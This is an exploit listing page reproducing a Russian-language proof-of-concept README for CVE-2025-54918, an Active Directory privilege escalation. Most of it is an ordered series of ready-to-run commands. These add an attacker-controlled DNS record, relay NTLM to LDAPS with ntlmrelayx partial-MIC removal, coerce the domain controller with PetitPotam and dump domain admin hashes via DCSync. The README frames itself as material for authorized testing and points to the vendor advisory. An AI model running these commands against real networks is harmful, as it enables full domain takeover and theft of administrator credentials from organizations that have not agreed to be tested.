Sploitus

Exploit for CVE-2025-54918-POC

kitploit · 2026-08-24

Exploit Code

MARKDOWN163 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-WH0AM123-CVE-2025-54918-POC
# CVE-2025-54918 – Доказательство концепции (PoC)

## ⚠️ Важное уведомление

> **ВАЖНО:**  
>  Для тестирования **CVE-2025-54918** необходимо **создать DNS-запись в целевой среде Active Directory**.  
>  Всегда консультируйтесь с клиентом и получайте **явное разрешение** перед тестированием, так как это может повлиять на поведение DNS и аутентификации в производственных средах.

Этот репозиторий содержит **техническое доказательство концепции** , демонстрирующее, как **пользователь домена с низкими привилегиями** может повысить свои права до **уровня администратора домена** , злоупотребляя **отражением NTLM в сочетании с принуждением аутентификации**.

Примечание: CVE эксплуатируется даже при установленном значении True для подписи, что является значением по умолчанию для контроллера домена. Также исправление для CVE-2025-54918 было выпущено для Windows 2025, а CVE-2025-33073 (непреднамеренно) исправило проблему для Windows 2022.

Более технический разбор доступен на моей странице Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1

* * *

## Среда

  * **IP контроллера домена:** `192.168.140.150` (Подпись установлена в True, что является значением по умолчанию для контроллера домена)
  * **IP атакующего:** `192.168.140.135`
  * **Домен:** `nahya.local`
  * **Пользователь:** `test` Действительный пользователь домена (без привилегий DCSync)



* * *

## Инструментарий

Клонируйте необходимые репозитории:

root@kitploit:~
    
    
    git clone https://github.com/dirkjanm/krbrelayx.git
    git clone https://github.com/decoder-it/impacket-partial-mic.git
    

* * *

## Базовая проверка (ожидаемая неудача)

Убедитесь, что пользователь не может выполнить DCSync до эксплуатации:

root@kitploit:~
    
    
    python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
    

![Normal User](https://assets.kitploit.com/production/public/readmes/21662/c3de698f6b113c509ee639c4ea86fad55683fd7025749364199550873b9ea1b7.png)

* * *

## Шаг 1: Добавление вредоносной DNS-записи

Создайте DNS-запись, используя **NetBIOS-имя + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA** , которое разрешается в IP атакующего.

root@kitploit:~
    
    
    python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
      dc.nahya.local -a add \
      -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
      -d '192.168.140.135' -dns-ip 192.168.140.150
    

![Adding DNS](https://assets.kitploit.com/production/public/readmes/21662/cd45b374ca2720dd826526f4bc0bba09674b6bf1e7f20bc823f18304c87a858c.png)

* * *

## Шаг 2: Запуск NTLM-ретранслятора (Терминал 1)

Запустите `ntlmrelayx` с **частичным удалением MIC** и включенной эскалацией LDAP:

root@kitploit:~
    
    
    python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs
    

![start ntlmrelayx](https://assets.kitploit.com/production/public/readmes/21662/733e8d92cd05c7fc5b3dce3211b04ed63acd055593607ad78141f1949518c7b0.png)

* * *

## Шаг 3: Принуждение аутентификации контроллера домена (Терминал 2)

Принудите контроллер домена аутентифицироваться на контролируемой атакующим DNS-записи с помощью техники принуждения (PetitPotam):

root@kitploit:~
    
    
    nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA
    

![coerce DC](https://assets.kitploit.com/production/public/readmes/21662/08c01cbd880fbcad812b6d76332e61c3b65285b22355d43f6a26c4586cdc4551.png)

* * *

## Шаг 4: Подтверждение эксплуатации (DCSync)

Повторно запустите `secretsdump`, чтобы подтвердить повышение привилегий:

root@kitploit:~
    
    
    python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC
    

✅ Ожидаемый результат: успешный **DCSync** и получение **хешей администратора домена**

![DCSync Worked](https://assets.kitploit.com/production/public/readmes/21662/f31e9fc00d72db63eb9928db481f07dd62ccf85f51cfaad19db93b4b1e9a9826.png)

* * *

## Результат

На этом этапе атакующий получил:

  * Ретранслированную NTLM-аутентификацию от контроллера домена (Signing True)
  * Повышенные привилегии через LDAP
  * Достигнут **DCSync** , что привело к **полной компрометации домена**



Обратитесь к **статье на Medium** для получения подробного объяснения уязвимости и цепочки атак.

* * *

## 🙏 Благодарности

Эта работа была бы невозможна без:

  * **Bryan De Houwer** – Автор **CVE-2025-54918** https://www.linkedin.com/in/bryan-de-houwer/
  * **Andrea Pierini** – За его отличные исследования и блоги на **decoder.cloud** https://www.linkedin.com/in/andrea-pierini-aba9a37/
  * **Andrea Pierini** – За реализацию `impacket-partial-mic`  
https://github.com/decoder-it/impacket-partial-mic



* * *

## 🔗 Ссылки

  * **Analyzing NTLM & LDAP Authentication Bypass Vulnerability** – Блог CrowdStrike  
https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  * **Microsoft Security Advisory – CVE-2025-54918** – Руководство по обновлению MSRC  
https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918




* * *

## Отказ от ответственности

Это доказательство концепции предоставляется **только для образовательных целей и авторизованного тестирования безопасности**.

  * Не используйте эту технику против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
  * Автор **не несет ответственности** за неправильное использование или ущерб.
  * Всегда следуйте практикам ответственного раскрытия и этичного хакинга.